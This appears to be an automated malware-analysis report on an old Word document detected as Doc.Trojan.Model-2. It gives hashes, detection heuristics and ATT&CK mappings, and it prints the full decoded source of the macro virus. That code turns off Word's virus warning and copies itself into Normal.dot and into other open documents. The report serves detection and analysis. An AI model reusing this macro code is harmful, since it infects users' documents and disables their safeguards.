Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 d0763f2fec9ab0ce…

MALICIOUS

Office (OLE)

33.0 KB Created: 1997-09-17 11:18:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: de45cb788cd90201315d82bbf3fbd801 SHA-1: 1c6776f58ae197ac592818b11b7a6b3e10f8307a SHA-256: d0763f2fec9ab0ce042483f3742ec76a23d02a4be597b9c89b1dd60d794e6c84
200 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is identified as malicious by ClamAV and contains VBA macros. The AutoOpen macro attempts to copy its code to the Normal.dot template and other open documents, indicating a likely attempt at persistence or spreading. The presence of legacy WordBasic markers also suggests older macro techniques.

Heuristics 4

  • ClamAV: Doc.Trojan.Model-2 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Model-2
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1281 bytes
SHA-256: 8931fb2cb62ade018122eb476db9df2eef515a68e248483206a0fa369e6d84a1
Detection
ClamAV: Doc.Trojan.Model-2
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Code"
Sub AutoOpen()
    RemoveProtection
    If Not ActiveDocument = NormalTemplate Then 'Infetta Normal.dot
        CopyVirCodeToModel
    End If
    If Not ActiveDocument = ThisDocument Then   'Infetta il documento aperto
        CopyVirCodeToDocument ActiveDocument
    End If
End Sub
Sub CopyVirCodeToModel()
On Local Error Resume Next
    With ActiveDocument
        .UpdateStylesOnOpen = False
        .AttachedTemplate = "Normal.dot"
    End With
    Application.OrganizerCopy Source:=ActiveDocument.FullName, Destination:=NormalTemplate.FullName, Name:="Code", Object:=wdOrganizerObjectProjectItems
    NormalTemplate.Save
End Sub
Sub CopyVirCodeToDocument(Target As Document)
    On Local Error Resume Next
    Application.OrganizerCopy Source:=NormalTemplate.FullName, Destination:=Target.FullName, Name:="Code", Object:=wdOrganizerObjectProjectItems
End Sub
Sub RemoveProtection()
    'Disattiva il messaggio di avviso iniziale
    Options.VirusProtection = False
End Sub